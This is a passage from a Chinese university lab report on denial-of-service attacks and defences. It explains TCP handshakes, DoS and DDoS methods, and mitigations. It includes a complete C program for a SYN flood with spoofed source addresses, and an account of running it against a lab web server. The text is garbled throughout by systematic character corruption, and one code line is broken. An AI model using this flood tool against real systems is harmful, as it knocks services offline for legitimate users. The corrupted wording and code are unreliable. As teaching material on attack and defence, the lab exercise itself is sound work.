實驗10-拒絕服務攻擊與防范

貴州大學實驗報告學院：計算機科學與技術學院專業(yè)：信息平安班級：姓名學號實驗組實驗時間指導教師蔣朝惠成績實驗工程名稱實驗十拒絕效勞攻擊與防范實驗目的拒絕效勞〔DoS〕攻擊與防范通過本實驗的學習,使大家了解拒絕效勞攻擊的原理以及相應的防范方法。通過一個SYNFlood的拒絕效勞程序,使大家加強對Dos攻擊的理解。分布式效勞〔DDoS〕攻擊與防范通過本實驗的學習,使大家了解分布式拒絕效勞(DDoS)攻擊的原理以及相應的防范方法。實驗要求通過實驗，理解和掌握DoS和DDoS的攻擊原理以及相應的防范方法實驗原理拒絕效勞〔DoS〕攻擊與防范TCP協(xié)議介紹傳輸控制協(xié)議是用來在不可靠的Internet上提供可靠的、端到端的字節(jié)流通信協(xié)議，在FRC793中有正式定義，還有一些解決錯誤的方案在RFC1122中有記錄，RFC1323那么有TCP的功能擴展。常見到的TCP/IP協(xié)議中，IP層不保證將數(shù)據(jù)報正確傳輸?shù)侥康牡豑CP那么從本地機器接收用戶的數(shù)據(jù)流，將其分成不超過64KB的數(shù)據(jù)字段，將每個數(shù)據(jù)片段作為單獨的IP數(shù)據(jù)包發(fā)送出去，最后在目的地機器中將其再組合成完整的字節(jié)流，TCP協(xié)議必須保證可靠性。發(fā)送方和接收方的TCP傳輸以數(shù)據(jù)段的形式交換數(shù)據(jù)，i一個數(shù)據(jù)段包括固定20字節(jié)，加上可選局部，后面再加上數(shù)據(jù)。TCP協(xié)議從發(fā)送方傳輸一個數(shù)據(jù)耳朵時候，其中有一個確認號，它等于希望收到的下一個數(shù)據(jù)段的序號，接收方還要發(fā)送回一個數(shù)據(jù)段，其中有一個確認號，它等于希望收到的下一個數(shù)據(jù)段的順序號。如果計時器在確認信息到達以前超時了，發(fā)送方會重新發(fā)送這個數(shù)據(jù)段。從上面的內(nèi)容可以在總體上了解一點TCP，重要的是熟悉TCP的數(shù)據(jù)頭。因為數(shù)據(jù)流的傳輸最重要的就是header里面的東西，至于發(fā)送的數(shù)據(jù)，只是TCP數(shù)據(jù)頭附帶上的、客戶端和效勞器端的效勞響應就是痛header里面的數(shù)據(jù)有關，兩端信息交流和交換是根據(jù)header中內(nèi)容實施的，因此，要了解DoS攻擊原理，就必須對TCP的header中的內(nèi)容非常熟悉。有關TCP數(shù)據(jù)段頭格式參見7.1.3節(jié)內(nèi)容。TCP連接采用“3次握手〞，其原理步驟如下所述。在沒有連接時，接受方效勞器處于監(jiān)聽狀態(tài)，等待其它機器發(fā)送連接請求。第一步，客戶端發(fā)送一個帶SYN位的請求，向效勞器表示需要連接。第二步，效勞器接收到這樣的請求后，查看監(jiān)聽的端口是否為指定端口，如果不是，那么發(fā)送RST=1應答，拒絕建立連接。如果是，那么效勞器發(fā)送確認，SYN為效勞器的一個內(nèi)碼，假設為100，ACK位那么為客戶端的請求序號加1，本例中發(fā)送的數(shù)據(jù)是：SYN=11,ACK=100，用這樣的數(shù)據(jù)發(fā)送給客戶端。向客戶端標明，效勞器連接已準備好，等待客戶端確實認。這時客戶端接收到信息后，分析得到的信息，準備發(fā)送確認連接信號到效勞器。第三步，客戶端發(fā)送確認信息建立連接的消息給效勞器端，確認信息的SYN位是效勞器發(fā)送的ACK位，ACK位是效勞器發(fā)送的SYN位加1.級：SYN=11，ACK=101。這時，連接已經(jīng)建立好了，可以進行發(fā)送數(shù)據(jù)的過程。效勞器不會在每次接收到SYN請求就立刻恢復客戶端建立連接，而是為連接請求分配內(nèi)存空間，建立會話，并放到一個隊列中。如果等待隊列已經(jīng)滿了，那么效勞器就不會再為新的連接分配資源，直接丟棄請求。如果到了這種地步，那么效勞器就是拒絕效勞了。拒絕效勞〔DoS〕攻擊〔1〕DoS的根本概念DoS的英文全稱是denialofservice,也就是“拒絕效勞〞的意思。從網(wǎng)絡攻擊的各種方法和所產(chǎn)生的破壞情況來看，DOS算是一種很簡單但又很有效的攻擊方式。它的目的就是拒絕效勞訪問，破壞效勞程序正常運行，最終它會使局部Internet連接和網(wǎng)絡系統(tǒng)失效。DoS的攻擊方式有很多種，最根本的DoS攻擊就是利用合理的效勞請求來占用過多的資源，從而使合法用戶無法得到效勞。DoS攻擊的根本過程是：攻擊者向效勞器發(fā)送眾多的帶有虛假地址請求，效勞器發(fā)送回復請求后等待回傳信息，由于地址是偽造的，所以效勞器一直等不到回傳的消息，分配給這次請求的資源就始終沒被釋放。當效勞器等待一段時間后，連接會因超時而唄切斷，攻擊者會再傳送一批新的請求，在這種反復發(fā)送偽地址請求的情況下，效勞器資源會最終被耗盡。被DOS攻擊事的現(xiàn)象大致有：①被攻擊主機上有大量等待的TCP連接。②被攻擊主機的系統(tǒng)資源被大量占用，造成系統(tǒng)停頓。③網(wǎng)絡充滿著大量無用的數(shù)據(jù)包，源地址為偽造地址。④大量無用數(shù)據(jù)使得網(wǎng)絡擁塞，受害主機無法與外界進行通信。⑤利用受害主機提供的效勞或傳輸協(xié)議上的缺陷，反復高速地發(fā)送特定的效勞請求，使受害主機無法及時處理所有正常請求，嚴重時會造成系統(tǒng)崩潰?！?〕拒絕效勞攻擊的根本方法要對效勞器實現(xiàn)拒絕效勞攻擊，實質(zhì)上有兩種方式：一是迫使效勞器的緩沖區(qū)滿，不接受新的請求；二是使用IP欺騙，迫使效勞器把合法的連接復位，影響合法用戶的連接。這就是DoS攻擊實施的根本思想。具體實現(xiàn)有一下幾種方法：①SNYFlood。編寫發(fā)包程序，設置TCP的Header，向效勞器端不斷成倍地發(fā)送只有SYN標志的TCP請求。當效勞器接收的時候，都認為是沒有建立起來的連接請求，于是為這些請求建立會話，排到緩沖隊列中。如果SYN請求超過了效勞器能容納的限度，緩沖區(qū)隊列占滿，那么效勞器就不再接收新請求了，其他合法用戶的連接都被拒絕掉。②IP欺騙DoS攻擊。這種攻擊利用RST位來實現(xiàn)。假設現(xiàn)在只有有一個合法用戶〔〕已經(jīng)同效勞器建立了正常的連接，攻擊者構造攻擊的TCP數(shù)據(jù)，偽裝自己的IP為，并向效勞器發(fā)送一個帶有RST位的TCP數(shù)據(jù)段。效勞器接收到這樣的數(shù)據(jù)后。認為從發(fā)送的連接錯誤，就會清空緩沖區(qū)中建好的連接。這時。如果合法用戶再發(fā)送合法數(shù)據(jù)；效勞器就已經(jīng)沒有這樣的連接了，該用戶就必須重新開始建立連接。使用這種攻擊方式時，需要偽造大量的IP地址，向目標發(fā)送RST數(shù)據(jù)，可以使效勞器不對合法用戶效勞。③Smurf。播送信息可以通過一定的手段發(fā)送到整個網(wǎng)絡機器中。當某臺機器使用播送地址發(fā)送一個ICMPecho請求包時，一些系統(tǒng)會回應一個ICMPecho回應包。④自身消耗的DoS攻擊。這種DoS攻擊就是把請求數(shù)據(jù)包中的客戶端IP和端口設置成主機自己IP和端口，再發(fā)送給主機，使得主機給自己發(fā)送TCP相應和連接。這樣，主機就會很快把資源耗光，直接導致死機。這種偽裝攻擊對一些身份認證系統(tǒng)威脅巨大。⑤塞滿效勞器的硬盤。通常，如果效勞器可以沒有限制地執(zhí)行寫操作；那么通過一些手段就可以造成硬盤被寫滿，從而拒絕效勞；比方發(fā)送垃圾郵件。⑥合理利用策略。一般效勞器都有關于賬戶鎖定的平安策略，比方某個賬戶連續(xù)3次登陸失敗，那么這個賬號將被鎖定。這點也可以被破壞者利用，他們偽裝一個賬號去錯誤登陸，這樣使得這個賬號被鎖定，而正常的合法用戶就不能使用賬號去登陸系統(tǒng)了。〔3〕拒絕效勞攻擊的防范到目前為止，防范DoS特別是DDoS攻擊仍比擬困難。但仍然可以采取一些措施以降低其產(chǎn)生的危害。對中小型網(wǎng)站來說，可以從以下幾個方面進行防范：①主機設置。即加固操作系統(tǒng)，對各操作系統(tǒng)參數(shù)進行設置以加強系統(tǒng)穩(wěn)固性。重新編譯或設置Linux以及操作各種BSD系統(tǒng)、Solaris等操作系統(tǒng)內(nèi)核中某些參數(shù)，可在一定程度上提高系統(tǒng)的抗攻擊能力。例如，對于DoS攻擊的典型種類——SYNFlood，它利用TCP/IP漏洞發(fā)送大量偽造的TCP連接請求，以造成網(wǎng)絡無法連接用戶效勞或使操作系統(tǒng)癱瘓。該攻擊過程涉及系統(tǒng)的一下參數(shù)：可等待的數(shù)據(jù)包的鏈接數(shù)和超時等待數(shù)據(jù)包的時間長度。因此，那么進行如下設置：●關閉不必要的效勞?！駥?shù)據(jù)包的鏈接數(shù)從默認值128或512改為2048或更大，以家常每次處理數(shù)據(jù)包隊列的長度；以緩解和消化更多數(shù)據(jù)包的連接。●將連接超時時間設置得較短，以保證正常數(shù)據(jù)包的連接，屏蔽非法攻擊包?！窦皶r更新系統(tǒng)、安裝補丁。②防火墻設置。仍以SYNFlood為例，可以在在防火墻上進行如下設置:●禁止對主機非開放效勞的訪問?！裣拗仆瑫r翻開的數(shù)據(jù)包最大連接數(shù)?！裣拗铺囟↖P地址的訪問?！駟⒂梅阑饓Φ姆繢DoS的屬性?！駠栏裣拗茖ν忾_放效勞器的向外訪問，以防止自己效勞器被當作工具攻擊他人?！馬andomDrop算法。當流量到達一定閥值時，按照算法規(guī)那么丟棄后續(xù)報文，以保持主機的處理能力。其缺乏是會誤丟正常的數(shù)據(jù)包，特別是在大流量數(shù)據(jù)包的攻擊下，正常數(shù)據(jù)包容易隨非法數(shù)據(jù)包被拒之網(wǎng)外?！馭YNCookie算法。采用“六次握手〞技術以降低受攻擊率。其缺乏是依據(jù)列表查詢，當數(shù)據(jù)流量增大時，列表急劇膨脹，計算量隨之提升，容易造成響應延遲乃至系統(tǒng)癱瘓。③路由器設置。以CISCO路由器為例，可采取如下方法。●CiscoExpressForwarding(CEF)?！袷褂肬nicasatreverse-path?！裨L問控制列表〔ACL〕過濾?！裨O置數(shù)據(jù)流量速率?！裆壈姹具^低的IOS?！駷槁酚善鹘ogserver。不管防火墻還是路由器都是到外界的接口設備，在進行防DDoS設置的同時，要權衡可能犧牲的正常業(yè)務代價，謹慎行事。④利用負載均衡技術。就是把應用業(yè)務分部到幾臺不同的效勞器上。采用循環(huán)DNS效勞或者硬件路由器技術，將進入系統(tǒng)的請求分流到多臺效勞器上。這種方法要求投資較大，相應的維護費也高，中型網(wǎng)站如果有條件可以考慮。以上方法對流量小、正對性強、結(jié)構簡單的DoS攻擊進行防范還是很有效的。而對于DDoS攻擊，那么需要能夠應付大流量的防范措施和技術，需要能夠綜合多種算法、集多種網(wǎng)絡設備功能的集成技術。分布式效勞〔DDoS〕攻擊與防范DDoS的根本概念分布式拒絕效勞攻擊時借助于客戶——效勞器技術，將多個計算機聯(lián)合起來作為攻擊平臺，對一個活活在多個目標發(fā)動攻擊，使成倍的增加攻擊能力。DDoS的攻擊原理Smurf與Fraggle將一個目的地址設置成播送地址后，它就會被網(wǎng)絡中的所有主機接收并處理。其中Smurf是用播送地址發(fā)送ICMPECHO包，而Fraggle是用播送地址發(fā)送UDP包。trinoo是復雜的DDoS攻擊程序，它使用主控程序master對實際實施攻擊的任何數(shù)量的“代理〞程序?qū)崿F(xiàn)自動控制。TFN2K是一個使用master程序與位于多個網(wǎng)絡上的哦國內(nèi)國際代理進行通信。Stacheldraht也是基于TFN的，采用C/S模式，其中master程序與潛在的成千上萬個代理程序進行通信。DDoS系統(tǒng)的一般結(jié)構在更一般的情況下，DDoS可能使用多臺控制機，形成一個攻擊結(jié)構。DDoS的監(jiān)測根據(jù)異常情況分析使用DDoS檢測工具DDoS攻擊的防御策略實驗儀器拒絕效勞〔DoS〕攻擊與防范安裝有Windows操作系統(tǒng)的PC，編輯工具可選用VC++6.0。由hub或交換機組成的有假設干臺PC局域網(wǎng)。分布式效勞〔DDoS〕攻擊與防范Windowsserver2003，風云壓力測試DDoS軟件，冰盾防火墻實驗步驟、內(nèi)容、數(shù)據(jù)拒絕效勞〔DoS〕攻擊與防范在一個局域網(wǎng)環(huán)境中，根據(jù)實驗內(nèi)容中提供的DoS程序，編寫一個SYNFlood拒絕效勞程序。使用自己編寫的DoS程序攻擊實驗室的一臺實驗主機，在實驗主機上安裝一個網(wǎng)絡監(jiān)聽工具〔如tcpdump等〕，觀測DoS攻擊效果。交自己編輯的SYNFlood拒絕效勞攻擊程序猿代碼，并對代碼中的關鍵步驟添加注釋，通過網(wǎng)絡監(jiān)聽工具觀測攻擊效果，并對實驗結(jié)果進行分析。SYNFlood程序如下：#include<stdio.h>#include<winsock2.h>#include<ws2tcpip.h>#include<windows.h>#include<time.h>#include<dos.h>#pragmacomment(lib,"ws2_32.lib")#defineMAX_RECEIVEBYTE255typedefstructip_head//定義IP首部{unsignedcharh_verlen;//4位首部長度,4位IP版本號unsignedchartos;//8位效勞類型TOSunsignedshorttotal_len;//16位總長度〔字節(jié)〕unsignedshortident;//16位標識unsignedshortfrag_and_flags;//3位標志位〔如SYN,ACK，等〕unsignedcharttl;//8位生存時間TTLunsignedcharproto;//8位協(xié)議(如ICMP，TCP等)unsignedshortchecksum;//16位IP首部校驗和unsignedintsourceIP;//32位源IP地址unsignedintdestIP;//32位目的IP地址}IPHEADER;typedefstructtcp_head//定義TCP首部{USHORTth_sport;//16位源端口USHORTth_dport;//16位目的端口unsignedintth_seq;//32位序列號unsignedintth_ack;//32位確認號unsignedcharth_lenres;//4位首部長度/6位保存字unsignedcharth_flag;//6位標志位USHORTth_win;//16位窗口大小USHORTth_sum;//16位校驗和USHORTth_urp;//16位緊急數(shù)據(jù)偏移量}TCPHEADER;typedefstructtsd_head//定義TCP偽首部{unsignedlongsaddr;//源地址unsignedlongdaddr;//目的地址charmbz;charptcl;//協(xié)議類型unsignedshorttcpl;//TCP長度}PSDHEADER;//CheckSum:計算校驗和的子函數(shù)USHORTchecksum(USHORT*buffer,intsize){unsignedlongcksum=0;while(size>1){cksum+=*buffer++;size-=sizeof(USHORT);}if(size){cksum+=*(UCHAR*)buffer;}cksum=(cksum>>16)+(cksum&0xffff);cksum+=(cksum>>16);return(USHORT)(~cksum);}voidusage(){printf("***********************************************************");printf("SYN_FLOODMADEBYLionD8");printf("Useage:FLOODTarget_ipTarget_portDelay_time");printf("***********************************************************");}//Delay_time單位為毫秒。intmain(intargc,char*argv[]){WSADATAWSAData;SOCKETsock;SOCKADDR_INaddr_in;IPHEADERipHeader;TCPHEADERtcpHeader;PSDHEADERpsdHeader;intSourcePort;charszSendBuf[60]={0};BOOLflag;intrect,nTimeOver;intsleeptime;usage();if(argc<3||argc>4){printf("inputerror!");returnfalse;}if(argc==4)sleeptime=atoi(argv[3]);elsesleeptime=300;if(WSAStartup(MAKEWORD(2,2),&WSAData)!=0){printf("WSAStartupError!");returnfalse;}sock=NULL;if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET){printf("SocketSetupError!");returnfalse;}flag=true;if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR){printf("setsockoptIP_HDRINCLerror!");returnfalse;}nTimeOver=1000;if(setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&nTimeOver,sizeof(nTimeOver))==SOCKET_ERROR)//設置發(fā)送的時間{printf("setsockoptSO_SNDTIMEOerror!");returnfalse;}addr_in.sin_family=AF_INET;addr_in.sin_port=htons(atoi(argv[2]));addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);while(TRUE){//填充IP首部ipHeader.h_verlen=(4<<4|sizeof(ipHeader)/sizeof(unsignedlong));ipHeader.tos=0;ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));//IP總長度ipHeader.ident=1;ipHeader.frag_and_flags=0;//無分片ipHeader.ttl=(unsignedchar)GetTickCount()%87+123;ipHto=IPPROTO_TCP;//協(xié)議類型為TCPipHeader.checksum=0;//效驗位先初始為0ipHeader.sourceIP=htonl(GetTickCount()*474695);//隨機產(chǎn)生一個偽造的IPipHeader.destIP=inet_addr(argv[1]);//目標IP//填充TCP首部SourcePort=GetTickCount()*43557%9898;//隨機產(chǎn)生一個端口號tcpHeader.th_dport=htons(atoi(argv[2]));//發(fā)送的目的端口tcpHeader.th_sport=htons(SourcePort);//源端口號tcpHeader.th_seq=htonl(0x12345678);//序列號tcpHeader.th_ack=0;//確認號tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);tcpHeader.th_flag=2;//為SYN請求tcpHeader.th_win=htons(512);tcpHeader.th_urp=0;tcpHeader.th_sum=0;//填充TCP偽首部用來計算TCP頭部的效驗和psdHeader.saddr=ipHeader.sourceIP;psdHeader.daddr=ipHeader.destIP;psdHeader.mbz=0;psdHeader.ptcl=IPPROTO_TCP;psdHeader.tcpl=htons(sizeof(tcpHeader));//計算校驗和memcpy(szSendBuf,&psdHeader,sizeof(psdHeader));memcpy(szSendBuf+sizeof(psdHeader),&tcpHeader,sizeof(tcpHeader));tcpHeader.th_sum=checksum((USHORT*)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));//把偽造好的IP頭和TCP頭放進buf準備發(fā)送memcpy(szSendBuf,&ipHeader,sizeof(ipHeader));memcpy(szSendBuf+sizeof(ipHeader),&tcpHeader,sizeof(tcpHeader));//發(fā)送數(shù)據(jù)包rect=sendto(sock,szSendBuf,sizeof(ipHeader)+sizeof(tcpHeader),0,(structsockaddr*)&addr_in,sizeof(addr_in));if(rect==SOCKET_ERROR){printf("senderror!:%x",WSAGetLastError());returnfalse;}elseprintf("sendok!");Sleep(sleeptime);//根據(jù)自己網(wǎng)速的快慢確定此值，sleeptime越小發(fā)得越快}//endwhile//重新偽造IP的源地址等再次向目標發(fā)送closesocket(sock);WSACleanup();return0;}運行代碼得到如下可執(zhí)行文件：攻擊之前，將一臺web效勞器的效勞端口改為1234，如下：訪問上面的web效勞器如下：DoS攻擊：最后一個參數(shù)60，表示每60ms發(fā)送一次，回車后：每60ms顯示一個sendok！表示發(fā)送成功。DoS攻擊之后，訪問之前的web效勞器，出現(xiàn)如下情況：說明DOS攻擊成功！分布式效勞〔DDoS〕攻擊與防范C1〔攻擊者〕上安裝DDoS客戶端程序，C2—C6〔傀儡機〕上安裝DDoS效勞器端，